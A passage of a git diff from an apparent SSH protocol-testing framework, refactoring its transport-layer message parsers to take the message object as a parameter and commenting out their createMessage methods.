DhGexKeyExchangeRequestMessage(); - } + /* + @Override + public DhGexKeyExchangeRequestMessage createMessage() { + return new DhGexKeyExchangeRequestMessage(); + } + */ - public void parseMinimalGroupSize() { + public void parseMinimalGroupSize(DhGexKeyExchangeRequestMessage message) { message.setMinimalGroupSize((parseIntField(DataFormatConstants.UINT32_SIZE))); LOGGER.debug("Minimal DH group size: {} bits", message.getMinimalGroupSize().getValue()); } - public void parsePreferredGroupSize() { + public void parsePreferredGroupSize(DhGexKeyExchangeRequestMessage message) { message.setPreferredGroupSize(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug( "Preferred DH group size: {} bits", message.getPreferredGroupSize().getValue()); } - public void parseMaximalGroupSize() { + public void parseMaximalGroupSize(DhGexKeyExchangeRequestMessage message) { message.setMaximalGroupSize(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Maximal DH group size: {} bits", message.getMaximalGroupSize().getValue()); } @Override - protected void parseMessageSpecificContents() { - parseMinimalGroupSize(); - parsePreferredGroupSize(); - parseMaximalGroupSize(); + protected void parseMessageSpecificContents(DhGexKeyExchangeRequestMessage message) { + parseMinimalGroupSize(message); + parsePreferredGroupSize(message); + parseMaximalGroupSize(message); } @Override public void parse(DhGexKeyExchangeRequestMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhKeyExchangeInitMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhKeyExchangeInitMessageParser.java index e93f48b9b..c7d3ea92c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhKeyExchangeInitMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhKeyExchangeInitMessageParser.java @@ -31,12 +31,12 @@ public DhKeyExchangeInitMessageParser(InputStream stream) { super(stream); } - @Override + /* @Override protected DhKeyExchangeInitMessage createMessage() { return new DhKeyExchangeInitMessage(); - } + }*/ - public void parseEphemeralPublicKey() { + public void parseEphemeralPublicKey(DhKeyExchangeInitMessage message) { message.setEphemeralPublicKeyLength(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug( "Ephemeral public key (client) length: " + message.getEphemeralPublicKeyLength()); @@ -47,12 +47,12 @@ public void parseEphemeralPublicKey() { } @Override - protected void parseMessageSpecificContents() { - parseEphemeralPublicKey(); + protected void parseMessageSpecificContents(DhKeyExchangeInitMessage message) { + parseEphemeralPublicKey(message); } @Override public void parse(DhKeyExchangeInitMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhKeyExchangeReplyMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhKeyExchangeReplyMessageParser.java index 5b1c906ec..e944bf4f5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhKeyExchangeReplyMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhKeyExchangeReplyMessageParser.java @@ -32,12 +32,14 @@ public DhKeyExchangeReplyMessageParser(InputStream stream) { super(stream); } - @Override - public DhKeyExchangeReplyMessage createMessage() { - return new DhKeyExchangeReplyMessage(); - } + /* + @Override + public DhKeyExchangeReplyMessage createMessage() { + return new DhKeyExchangeReplyMessage(); + } + */ - private void parseHostKeyBytes() { + private void parseHostKeyBytes(DhKeyExchangeReplyMessage message) { message.setHostKeyBytesLength(parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); LOGGER.debug("Host key bytes length: " + message.getHostKeyBytesLength().getValue()); message.setHostKeyBytes(parseByteArrayField(message.getHostKeyBytesLength().getValue())); @@ -46,7 +48,7 @@ private void parseHostKeyBytes() { + ArrayConverter.bytesToRawHexString(message.getHostKeyBytes().getValue())); } - private void parseEphemeralPublicKey() { + private void parseEphemeralPublicKey(DhKeyExchangeReplyMessage message) { message.setEphemeralPublicKeyLength( parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); LOGGER.debug( @@ -57,7 +59,7 @@ private void parseEphemeralPublicKey() { LOGGER.debug("Ephemeral public key (server): " + message.getEphemeralPublicKey()); } - private void parseSignature() { + private void parseSignature(DhKeyExchangeReplyMessage message) { message.setSignatureLength(parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); LOGGER.debug("Signature length: " + message.getSignatureLength().getValue()); message.setSignature(parseByteArrayField(message.getSignatureLength().getValue())); @@ -65,14 +67,14 @@ private void parseSignature() { } @Override - protected void parseMessageSpecificContents() { - parseHostKeyBytes(); - parseEphemeralPublicKey(); - parseSignature(); + protected void parseMessageSpecificContents(DhKeyExchangeReplyMessage message) { + parseHostKeyBytes(message); + parseEphemeralPublicKey(message); + parseSignature(message); } @Override public void parse(DhKeyExchangeReplyMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DisconnectMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DisconnectMessageParser.java index e729f69bb..f20707521 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DisconnectMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DisconnectMessageParser.java @@ -36,12 +36,14 @@ public DisconnectMessageParser(InputStream stream) { super(stream); } - @Override - public DisconnectMessage createMessage() { - return new DisconnectMessage(); - } + /* + @Override + public DisconnectMessage createMessage() { + return new DisconnectMessage(); + } + */ - private void parseReasonCode() { + private void parseReasonCode(DisconnectMessage message) { message.setReasonCode(parseIntField(DataFormatConstants.UINT32_SIZE)); if (DisconnectReason.fromId(message.getReasonCode().getValue()) != null) { LOGGER.debug( @@ -55,7 +57,7 @@ private void parseReasonCode() { } } - private void parseDescription() { + private void parseDescription(DisconnectMessage message) { message.setDescriptionLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Description length: " + message.getDescriptionLength().getValue()); message.setDescription( @@ -63,7 +65,7 @@ private void parseDescription() { LOGGER.debug("Description: {}", backslashEscapeString(message.getDescription().getValue())); } - private void parseLanguageTag() { + private void parseLanguageTag(DisconnectMessage message) { message.setLanguageTagLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Language tag length: " + message.getLanguageTagLength().getValue()); message.setLanguageTag( @@ -74,14 +76,14 @@ private void parseLanguageTag() { } @Override - protected void parseMessageSpecificContents() { - parseReasonCode(); - parseDescription(); - parseLanguageTag(); + protected void parseMessageSpecificContents(DisconnectMessage message) { + parseReasonCode(message); + parseDescription(message); + parseLanguageTag(message); } @Override public void parse(DisconnectMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeInitMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeInitMessageParser.java index f070c65b9..fed88d8c2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeInitMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeInitMessageParser.java @@ -31,12 +31,12 @@ public EcdhKeyExchangeInitMessageParser(InputStream stream) { super(stream); } - @Override + /* @Override public EcdhKeyExchangeInitMessage createMessage() { return new EcdhKeyExchangeInitMessage(); - } + }*/ - private void parseEphemeralPublicKey() { + private void parseEphemeralPublicKey(EcdhKeyExchangeInitMessage message) { message.setEphemeralPublicKeyLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug( "Ephemeral public key (client) length: " @@ -50,12 +50,12 @@ private void parseEphemeralPublicKey() { } @Override - public void parseMessageSpecificContents() { - parseEphemeralPublicKey(); + public void parseMessageSpecificContents(EcdhKeyExchangeInitMessage message) { + parseEphemeralPublicKey(message); } @Override public void parse(EcdhKeyExchangeInitMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeReplyMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeReplyMessageParser.java index f416642c6..979723ba1 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeReplyMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeReplyMessageParser.java @@ -34,12 +34,12 @@ public EcdhKeyExchangeReplyMessageParser(InputStream stream) { super(stream); } - @Override - public EcdhKeyExchangeReplyMessage createMessage() { - return new EcdhKeyExchangeReplyMessage(); - } - - private void parseHostKeyBytes() { + /* @Override + public EcdhKeyExchangeReplyMessage createMessage() { + return new EcdhKeyExchangeReplyMessage(); + } + */ + private void parseHostKeyBytes(EcdhKeyExchangeReplyMessage message) { message.setHostKeyBytesLength(parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); LOGGER.debug("Host key bytes length: " + message.getHostKeyBytesLength().getValue()); message.setHostKeyBytes(parseByteArrayField(message.getHostKeyBytesLength().getValue())); @@ -48,7 +48,7 @@ private void parseHostKeyBytes() { + ArrayConverter.bytesToRawHexString(message.getHostKeyBytes().getValue())); } - private void parseEphemeralPublicKey() { + private void parseEphemeralPublicKey(EcdhKeyExchangeReplyMessage message) { message.setEphemeralPublicKeyLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug( "Ephemeral public key (server) length: " @@ -61,7 +61,7 @@ private void parseEphemeralPublicKey() { message.getEphemeralPublicKey().getValue())); } - private void parseSignature() { + private void parseSignature(EcdhKeyExchangeReplyMessage message) { message.setSignatureLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Signature length: " + message.getSignatureLength().getValue()); message.setSignature(parseByteArrayField(message.getSignatureLength().getValue())); @@ -71,14 +71,14 @@ private void parseSignature() { } @Override - public void parseMessageSpecificContents() { - parseHostKeyBytes(); - parseEphemeralPublicKey(); - parseSignature(); + public void parseMessageSpecificContents(EcdhKeyExchangeReplyMessage message) { + parseHostKeyBytes(message); + parseEphemeralPublicKey(message); + parseSignature(message); } @Override public void parse(EcdhKeyExchangeReplyMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeInitMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeInitMessageParser.java index a1108e44d..b78cb628c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeInitMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeInitMessageParser.java @@ -55,7 +55,7 @@ public HybridKeyExchangeInitMessageParser(SshContext context, InputStream stream this.agreementSize = agreementSize; }*/ - private void parseHybridKey() { + private void parseHybridKey(HybridKeyExchangeInitMessage message) { int length = parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH); LOGGER.debug("Total Length: " + length); @@ -79,17 +79,17 @@ private void parseHybridKey() { } @Override - protected void parseMessageSpecificContents() { - parseHybridKey(); - } - - @Override - protected HybridKeyExchangeInitMessage createMessage() { - return new HybridKeyExchangeInitMessage(); + protected void parseMessageSpecificContents(HybridKeyExchangeInitMessage message) { + parseHybridKey(message); } + /* @Override + protected HybridKeyExchangeInitMessage createMessage() { + return new HybridKeyExchangeInitMessage(); + } + */ @Override public void parse(HybridKeyExchangeInitMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeReplyMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeReplyMessageParser.java index 334559743..2eb0c8dba 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeReplyMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeReplyMessageParser.java @@ -56,7 +56,7 @@ public HybridKeyExchangeReplyMessageParser(SshContext context, InputStream strea this.combiner = combiner; } - private void parseHostKeyBytes() { + private void parseHostKeyBytes(HybridKeyExchangeReplyMessage message) { message.setHostKeyBytesLength(parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); LOGGER.debug("Host key byte length" + message.getHostKeyBytesLength()); message.setHostKeyBytes(parseByteArrayField(message.getHostKeyBytesLength().getValue())); @@ -65,7 +65,7 @@ private void parseHostKeyBytes() { + ArrayConverter.bytesToHexString(message.getHostKeyBytes().getValue())); } - private void parseHybridKey() { + private void parseHybridKey(HybridKeyExchangeReplyMessage message) { int length = parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH); LOGGER.debug("Total Length: " + length); @@ -88,7 +88,7 @@ private void parseHybridKey() { } } - private void parseSignature() { + private void parseSignature(HybridKeyExchangeReplyMessage message) { message.setSignatureLength(parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); LOGGER.debug("Signature length: " + message.getSignatureLength().getValue()); message.setSignature(parseByteArrayField(message.getSignatureLength().getValue())); @@ -96,19 +96,21 @@ private void parseSignature() { } @Override - protected void parseMessageSpecificContents() { - parseHostKeyBytes(); - parseHybridKey(); - parseSignature(); + protected void parseMessageSpecificContents(HybridKeyExchangeReplyMessage message) { + parseHostKeyBytes(message); + parseHybridKey(message); + parseSignature(message); } - @Override - protected HybridKeyExchangeReplyMessage createMessage() { - return new HybridKeyExchangeReplyMessage(); - } + /* + @Override + protected HybridKeyExchangeReplyMessage createMessage() { + return new HybridKeyExchangeReplyMessage(); + } + */ @Override public void parse(HybridKeyExchangeReplyMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/IgnoreMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/IgnoreMessageParser.java index 5d5b32eeb..e30c3c39a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/IgnoreMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/IgnoreMessageParser.java @@ -33,12 +33,12 @@ public IgnoreMessageParser(InputStream stream) { super(stream); } - @Override - public IgnoreMessage createMessage() { - return new IgnoreMessage(); - } - - private void parseData() { + /* @Override + public IgnoreMessage createMessage() { + return new IgnoreMessage(); + } + */ + private void parseData(IgnoreMessage message) { message.setDataLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Data length: " + message.getDataLength().getValue()); message.setData(parseByteArrayField(message.getDataLength().getValue())); @@ -46,12 +46,12 @@ private void parseData() { } @Override - protected void parseMessageSpecificContents() { - parseData(); + protected void parseMessageSpecificContents(IgnoreMessage message) { + parseData(message); } @Override public void parse(IgnoreMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/KeyExchangeInitMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/KeyExchangeInitMessageParser.java index d7615a878..77ee4afe0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/KeyExchangeInitMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/KeyExchangeInitMessageParser.java @@ -37,17 +37,19 @@ public KeyExchangeInitMessageParser(InputStream stream) { super(stream); } - @Override - public KeyExchangeInitMessage createMessage() { - return new KeyExchangeInitMessage(); - } + /* + @Override + public KeyExchangeInitMessage createMessage() { + return new KeyExchangeInitMessage(); + } + */ - private void parseCookie() { + private void parseCookie(KeyExchangeInitMessage message) { message.setCookie(parseByteArrayField(KeyExchangeInitConstants.COOKIE_LENGTH)); LOGGER.debug("Cookie: " + message.getCookie()); } - private void parseKeyExchangeAlgorithms() { + private void parseKeyExchangeAlgorithms(KeyExchangeInitMessage message) { message.setKeyExchangeAlgorithmsLength( parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug( @@ -62,7 +64,7 @@ private void parseKeyExchangeAlgorithms() { backslashEscapeString(message.getKeyExchangeAlgorithms().getValue())); } - private void parseServerHostKeyAlgorithms() { + private void parseServerHostKeyAlgorithms(KeyExchangeInitMessage message) { message.setServerHostKeyAlgorithmsLength( parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug( @@ -77,7 +79,7 @@ private void parseServerHostKeyAlgorithms() { backslashEscapeString(message.getServerHostKeyAlgorithms().getValue())); } - private void parseEncryptionAlgorithmsClientToServer() { + private void parseEncryptionAlgorithmsClientToServer(KeyExchangeInitMessage message) { message.setEncryptionAlgorithmsClientToServerLength( parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug( @@ -92,7 +94,7 @@ private void parseEncryptionAlgorithmsClientToServer() { backslashEscapeString(message.getEncryptionAlgorithmsClientToServer().getValue())); } - private void parseEncryptionAlgorithmsServerToClient() { + private void parseEncryptionAlgorithmsServerToClient(KeyExchangeInitMessage message) { message.setEncryptionAlgorithmsServerToClientLength( parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug( @@ -107,7 +109,7 @@ private void parseEncryptionAlgorithmsServerToClient() { backslashEscapeString(message.getEncryptionAlgorithmsServerToClient().getValue())); } - private void parseMacAlgorithmsClientToServer() { + private void parseMacAlgorithmsClientToServer(KeyExchangeInitMessage message) { message.setMacAlgorithmsClientToServerLength( parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug( @@ -122,7 +124,7 @@ private void parseMacAlgorithmsClientToServer() { backslashEscapeString(message.getMacAlgorithmsClientToServer().getValue())); } - private void parseMacAlgorithmsServerToClient() { + private void parseMacAlgorithmsServerToClient(KeyExchangeInitMessage message) { message.setMacAlgorithmsServerToClientLength( parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug( @@ -137,7 +139,7 @@ private void parseMacAlgorithmsServerToClient() { backslashEscapeString(message.getMacAlgorithmsServerToClient().getValue())); } - private void parseCompressionMethodsClientToServer() { + private void parseCompressionMethodsClientToServer(KeyExchangeInitMessage message) { message.setCompressionMethodsClientToServerLength( parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug( @@ -152,7 +154,7 @@ private void parseCompressionMethodsClientToServer() { backslashEscapeString(message.getCompressionMethodsClientToServer().getValue())); } - private void parseCompressionMethodsServerToClient() { + private void parseCompressionMethodsServerToClient(KeyExchangeInitMessage message) { message.setCompressionMethodsServerToClientLength( parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug( @@ -167,7 +169,7 @@ private void parseCompressionMethodsServerToClient() { backslashEscapeString(message.getCompressionMethodsServerToClient().getValue())); } - private void parseLanguagesClientToServer() { + private void parseLanguagesClientToServer(KeyExchangeInitMessage message) { message.setLanguagesClientToServerLength( parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug( @@ -182,7 +184,7 @@ private void parseLanguagesClientToServer() { backslashEscapeString(message.getLanguagesClientToServer().getValue())); } - private void parseLanguagesServerToClient() { + private void parseLanguagesServerToClient(KeyExchangeInitMessage message) { message.setLanguagesServerToClientLength( parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug( @@ -197,7 +199,7 @@ private void parseLanguagesServerToClient() { backslashEscapeString(message.getLanguagesServerToClient().getValue())); } - private void parseFirstKeyExchangePacketFollows() { + private void parseFirstKeyExchangePacketFollows(KeyExchangeInitMessage message) { message.setFirstKeyExchangePacketFollows(parseByteField(1)); LOGGER.debug( "First key exchange packet follows: " @@ -205,30 +207,30 @@ private void parseFirstKeyExchangePacketFollows() { message.getFirstKeyExchangePacketFollows().getValue())); } - private void parseReserved() { + private void parseReserved(KeyExchangeInitMessage message) { message.setReserved(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Reserved: " + message.getReserved().getValue()); } @Override - public void parseMessageSpecificContents() { - parseCookie(); - parseKeyExchangeAlgorithms(); - parseServerHostKeyAlgorithms(); - parseEncryptionAlgorithmsClientToServer(); - parseEncryptionAlgorithmsServerToClient(); - parseMacAlgorithmsClientToServer(); - parseMacAlgorithmsServerToClient(); - parseCompressionMethodsClientToServer(); - parseCompressionMethodsServerToClient(); - parseLanguagesClientToServer(); - parseLanguagesServerToClient(); - parseFirstKeyExchangePacketFollows(); - parseReserved(); + public void parseMessageSpecificContents(KeyExchangeInitMessage message) { + parseCookie(message); + parseKeyExchangeAlgorithms(message); + parseServerHostKeyAlgorithms(message); + parseEncryptionAlgorithmsClientToServer(message); + parseEncryptionAlgorithmsServerToClient(message); + parseMacAlgorithmsClientToServer(message); + parseMacAlgorithmsServerToClient(message); + parseCompressionMethodsClientToServer(message); + parseCompressionMethodsServerToClient(message); + parseLanguagesClientToServer(message); + parseLanguagesServerToClient(message); + parseFirstKeyExchangePacketFollows(message); + parseReserved(message); } @Override public void parse(KeyExchangeInitMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/NewKeysMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/NewKeysMessageParser.java index 9b14b5967..ac749498e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/NewKeysMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/NewKeysMessageParser.java @@ -26,16 +26,18 @@ public NewKeysMessageParser(InputStream stream) { super(stream); } - @Override - public NewKeysMessage createMessage() { - return new NewKeysMessage(); - } + /* + @Override + public NewKeysMessage createMessage() { + return new NewKeysMessage(); + } + */ @Override - protected void parseMessageSpecificContents() {} + protected void parseMessageSpecificContents(NewKeysMessage message) {} @Override public void parse(NewKeysMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangeDoneMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangeDoneMessageParser.java index a1ef61451..87fa3b0ae 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangeDoneMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangeDoneMessageParser.java @@ -33,20 +33,22 @@ public RsaKeyExchangeDoneMessageParser(InputStream stream) { @Override public void parse(RsaKeyExchangeDoneMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override - protected RsaKeyExchangeDoneMessage createMessage() { - return new RsaKeyExchangeDoneMessage(); - } + /* + @Override + protected RsaKeyExchangeDoneMessage createMessage() { + return new RsaKeyExchangeDoneMessage(); + } + */ @Override - protected void parseMessageSpecificContents() { - parseSignature(); + protected void parseMessageSpecificContents(RsaKeyExchangeDoneMessage message) { + parseSignature(message); } - private void parseSignature() { + private void parseSignature(RsaKeyExchangeDoneMessage message) { message.setSignatureLength(parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); LOGGER.debug("Signature length: " + message.getSignatureLength().getValue()); message.setSignature(parseByteArrayField(message.getSignatureLength().getValue())); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangePubkeyMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangePubkeyMessageParser.java index fa7f93516..d2b195a8f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangePubkeyMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangePubkeyMessageParser.java @@ -34,22 +34,24 @@ public RsaKeyExchangePubkeyMessageParser(InputStream stream) { @Override public void parse(RsaKeyExchangePubkeyMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override - protected RsaKeyExchangePubkeyMessage createMessage() { - return new RsaKeyExchangePubkeyMessage(); - } + /* + @Override + protected RsaKeyExchangePubkeyMessage createMessage() { + return new RsaKeyExchangePubkeyMessage(); + } + */ - private void parseHostKeyBytes() { + private void parseHostKeyBytes(RsaKeyExchangePubkeyMessage message) { message.setHostKeyBytesLength(parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); LOGGER.debug("Host key bytes length: " + message.getHostKeyBytesLength().getValue()); message.setHostKeyBytes(parseByteArrayField(message.getHostKeyBytesLength().getValue())); LOGGER.debug("Host key bytes: " + message.getHostKeyBytes()); } - private void parseTransientPublicKey() { + private void parseTransientPublicKey(RsaKeyExchangePubkeyMessage message) { message.setTransientPublicKeyBytesLength( parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); LOGGER.debug( @@ -61,8 +63,8 @@ private void parseTransientPublicKey() { } @Override - protected void parseMessageSpecificContents() { - parseHostKeyBytes(); - parseTransientPublicKey(); + protected void parseMessageSpecificContents(RsaKeyExchangePubkeyMessage message) { + parseHostKeyBytes(message); + parseTransientPublicKey(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangeSecretMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangeSecretMessageParser.java index 6a740b3de..e9d33d3c7 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangeSecretMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangeSecretMessageParser.java @@ -35,15 +35,15 @@ public RsaKeyExchangeSecretMessageParser(InputStream stream) { @Override public void parse(RsaKeyExchangeSecretMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override + /* @Override public RsaKeyExchangeSecretMessage createMessage() { return new RsaKeyExchangeSecretMessage(); - } + }*/ - private void parseEncryptedSecret() { + private void parseEncryptedSecret(RsaKeyExchangeSecretMessage message) { message.setEncryptedSecretLength(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Encrypted secret length: {}", message.getEncryptedSecretLength().getValue()); message.setEncryptedSecret( @@ -52,7 +52,7 @@ private void parseEncryptedSecret() { } @Override - protected void parseMessageSpecificContents() { - parseEncryptedSecret(); + protected void parseMessageSpecificContents(RsaKeyExchangeSecretMessage message) { + parseEncryptedSecret(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceAcceptMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceAcceptMessageParser.java index 65145222e..ac8932d96 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceAcceptMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceAcceptMessageParser.java @@ -33,7 +33,7 @@ public ServiceAcceptMessageParser(InputStream stream) { super(stream); } - private void parseServiceType() { + private void parseServiceType(ServiceAcceptMessage message) { message.setServiceNameLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Service name length: " + message.getServiceNameLength()); message.setServiceName( @@ -43,17 +43,19 @@ private void parseServiceType() { } @Override - protected void parseMessageSpecificContents() { - parseServiceType(); + protected void parseMessageSpecificContents(ServiceAcceptMessage message) { + parseServiceType(message); } - @Override - public ServiceAcceptMessage createMessage() { - return new ServiceAcceptMessage(); - } + /* + @Override + public ServiceAcceptMessage createMessage() { + return new ServiceAcceptMessage(); + } + */ @Override public void parse(ServiceAcceptMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceRequestMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceRequestMessageParser.java index 4f3dc7144..fc3950e14 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceRequestMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceRequestMessageParser.java @@ -33,7 +33,7 @@ public ServiceRequestMessageParser(InputStream stream) { super(array, startPosition); }*/ - private void parseServiceName() { + private void parseServiceName(ServiceRequestMessage message) { message.setServiceNameLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Service name length: " + message.getServiceNameLength().getValue()); message.setServiceName( @@ -43,18 +43,18 @@ private void parseServiceName() { "Service name: {}", backslashEscapeString(message.getServiceName().getValue())); } - @Override + /* @Override public ServiceRequestMessage createMessage() { return new ServiceRequestMessage(); - 